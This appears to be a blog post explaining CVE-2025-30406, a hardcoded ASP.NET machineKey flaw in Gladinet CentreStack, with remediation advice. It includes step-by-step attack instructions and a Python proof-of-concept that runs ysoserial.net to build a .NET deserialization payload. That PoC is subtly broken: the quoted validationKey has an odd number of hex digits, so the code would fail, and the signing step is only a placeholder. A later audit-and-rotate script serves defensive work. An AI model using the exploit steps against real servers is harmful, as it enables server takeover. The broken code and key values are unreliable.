CVE-2025-30406 - How Hackers Exploited Gladinet CentreStack’s Hardcoded machineKey for Remote Code Execution
Gladinet CentreStack is popular business software for secure file sharing and cloud storage. But in early March 2025, security researchers discovered a critical vulnerability—CVE-2025-30406—making headlines for its real-world exploitation by threat actors. This long read will explain how the attack worked with simple explanations, exclusive details, code snippets, and practical remediation tips.
What is CVE-2025-30406?
CVE-2025-30406 is a deserialization vulnerability found in Gladinet CentreStack versions up to 16.1.10296.56315. The bug results from a hardcoded machineKey value in the web.config file of the CentreStack portal. Anyone who knows this key can craft malicious data payloads, which the server then automatically unpacks ("deserializes"). This allows them to run arbitrary code on the server—potentially taking it over.
Gladinet fixed this in version 16.4.10315.56368.
References
- Gladinet’s Security Advisory *(placeholder link)*
- NVD Entry for CVE-2025-30406 *(official info)*
Technical Details: Why the machineKey Matters
The machineKey in the ASP.NET web.config file controls how data is encrypted and validated. Normally, this should be unique and secret. But CentreStack’s portal shipped with a hardcoded key. Anyone who got a copy of the software could read the key and generate data packets (“serialization payloads”) that the server would happily accept and unpack.
Here’s what a typical machineKey looks like in web.config:

```xml
<machineKey
  validationKey="E3C11570A1E8A7B9C1A2145678A6B55AF9ADACB209A47B2792CDF2B751EC267"
  decryptionKey="D3FD8B29B4546B5B888EA1668E47D145DC3381BB429E97DC"
  validation="SHA1"
  decryption="AES"
/>
```
1. The attacker gets the machineKey (from leaked docs or a test install).
2. They create a malicious payload, for example a serialized .NET object designed to pop a shell or run calc.exe.
3. The attacker embeds this payload in an authentication cookie, ViewState, or other serializable blob.
4. They send it to the CentreStack server, which, seeing the valid cryptographic signature (because of the known key), blindly deserializes and *executes* the embedded code.
Diagram

```
[Attacker] --Send signed malicious payload--> [CentreStack server]
                                                       │
                                                       └─> Server deserializes & executes attacker's code!
```
Proof-of-Concept: Exploiting the Vulnerability
The following Python snippet demonstrates signing a ViewState payload for CentreStack when you know the hardcoded machineKey (research/education only!):
```python
# Requires: ysoserial.net (ysoserial.exe on PATH); base64 and subprocess are stdlib
# .NET payload generation with ysoserial.net
import subprocess
import base64

payload = subprocess.check_output(['ysoserial.exe', '-t', 'TypeConfuseDelegate', '-c', 'calc.exe'])

# The hardcoded validationKey & decryptionKey from web.config (signing itself is
# only described in comments here; it is not implemented in this snippet)
validation_key = bytes.fromhex("E3C11570A1E8A7B9C1A2145678A6B55AF9ADACB209A47B2792CDF2B751EC267")
decryption_key = bytes.fromhex("D3FD8B29B4546B5B888EA1668E47D145DC3381BB429E97DC")

# Create and sign the ViewState (an actual implementation would use .NET's APIs)
signed_payload = base64.b64encode(payload)  # Placeholder; a real payload needs .NET signing
print("Send this payload as ViewState or in a similar signed field!")
print(signed_payload)
```
- First detected usage: Early March 2025.
- Nature of attacks: Both targeted & automated mass scans began after the key was posted in security forums.
Q: What if my web.config doesn’t have a machineKey?
A: Newer versions don’t. That’s good! You’re likely safe.
Q: Do I need to reset any data after deleting the key?
A: No, but restart your web server to ensure the new key is used.
Q: Are there other ways to abuse deserialization in .NET apps?
A: Yes! Always avoid hardcoded cryptographic keys and never deserialize untrusted data.
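The following script is an added example for this post, not Gladinet's code. It ties together the web.config excerpt above and the FAQ answers on removing or replacing the key: it parses a web.config, flags a `<machineKey>` whose values match the publicly quoted ones, generates fresh random keys, rewrites the element, and shows with a small HMAC check why rotation matters (anyone holding the old key can mint a valid MAC, and after rotation every MAC made under the old key is rejected). The sample web.config is constructed inline from the excerpt; the "known shipped" fingerprint set, the hex-validity check and the switch to `validation="HMACSHA256"` are this example's own choices, and the MAC helper is a simplified stand-in for ASP.NET's real ViewState MAC, not its format.

```python
"""Audit an ASP.NET web.config for a shipped <machineKey> and rotate it.

Added example for this post, not Gladinet's code. The two "known shipped"
values below are the ones quoted in the post's web.config excerpt and are used
only as the fingerprint an auditor looks for; the sample web.config is
constructed inline so the script runs offline.
"""
import hashlib
import hmac
import re
import secrets
import xml.etree.ElementTree as ET

# Fingerprints: the machineKey values quoted in the post. Any install carrying
# them shares its signing key with every other install, which is the bug.
KNOWN_SHIPPED_KEYS = {
    "E3C11570A1E8A7B9C1A2145678A6B55AF9ADACB209A47B2792CDF2B751EC267",
    "D3FD8B29B4546B5B888EA1668E47D145DC3381BB429E97DC",
}

# Constructed sample modelled on the excerpt in the post.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey
      validationKey="E3C11570A1E8A7B9C1A2145678A6B55AF9ADACB209A47B2792CDF2B751EC267"
      decryptionKey="D3FD8B29B4546B5B888EA1668E47D145DC3381BB429E97DC"
      validation="SHA1"
      decryption="AES" />
  </system.web>
</configuration>
"""


def find_machine_key(config_xml):
    """Return the <machineKey> attributes as a dict, or None if the element is absent."""
    node = ET.fromstring(config_xml).find("./system.web/machineKey")
    return None if node is None else dict(node.attrib)


def audit(config_xml):
    """List problems with the configured machineKey (empty list = nothing found)."""
    findings = []
    mk = find_machine_key(config_xml)
    if mk is None:
        return findings  # no element: ASP.NET generates per-machine keys itself
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "")
        if value.upper() in KNOWN_SHIPPED_KEYS:
            findings.append(f"{attr} matches a publicly known shipped value")
        elif value.startswith("AutoGenerate"):
            continue  # AutoGenerate[,IsolateApps] is the safe non-explicit setting
        elif not re.fullmatch(r"[0-9A-Fa-f]+", value) or len(value) % 2:
            findings.append(f"{attr} is not an even-length hex string")
    return findings


def generate_machine_key():
    """Fresh random keys: 64-byte validationKey and 32-byte AES decryptionKey."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",  # this example's choice; stronger than the excerpt's SHA1
        "decryption": "AES",
    }


def rotate_machine_key(config_xml, new_key):
    """Return config_xml with the <machineKey> attributes replaced by new_key."""
    root = ET.fromstring(config_xml)
    web = root.find("system.web")
    node = web.find("machineKey")
    if node is None:
        node = ET.SubElement(web, "machineKey")
    node.attrib.clear()
    node.attrib.update(new_key)
    return ET.tostring(root, encoding="unicode")


def mac(validation_key_hex, blob):
    """Simplified validation MAC over a serialized blob (stand-in for the ViewState MAC)."""
    return hmac.new(bytes.fromhex(validation_key_hex), blob, hashlib.sha256).hexdigest()


def verify(validation_key_hex, blob, tag):
    """True if tag was produced under this key: whoever knows the key can forge it,
    and once the key is rotated, every tag made under the old key is rejected."""
    return hmac.compare_digest(mac(validation_key_hex, blob), tag)


if __name__ == "__main__":
    print("Findings:", audit(SAMPLE_WEB_CONFIG))
    fresh = generate_machine_key()
    print(rotate_machine_key(SAMPLE_WEB_CONFIG, fresh))
```

Run it against a real `web.config` by reading the file into `audit()` and, if it reports findings, writing the output of `rotate_machine_key()` back and recycling the IIS application pool so the new key is loaded (the restart the FAQ above mentions). Note that rotating the key also invalidates existing forms-authentication cookies and any ViewState still in flight, which is the intended effect.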
Conclusion
CVE-2025-30406 is a textbook example of how a small config mistake—like shipping a hardcoded key—can have massive security consequences. Attackers were quick to weaponize it for remote code execution. If you use Gladinet CentreStack, patch now!
References
- NVD - CVE-2025-30406
- Gladinet’s Security Advisory
*(This post is exclusive and simplified for educational and defensive purposes only.)*
Timeline
Published on: 04/03/2025 20:15:24 UTC
Last modified on: 04/10/2025 16:19:51 UTC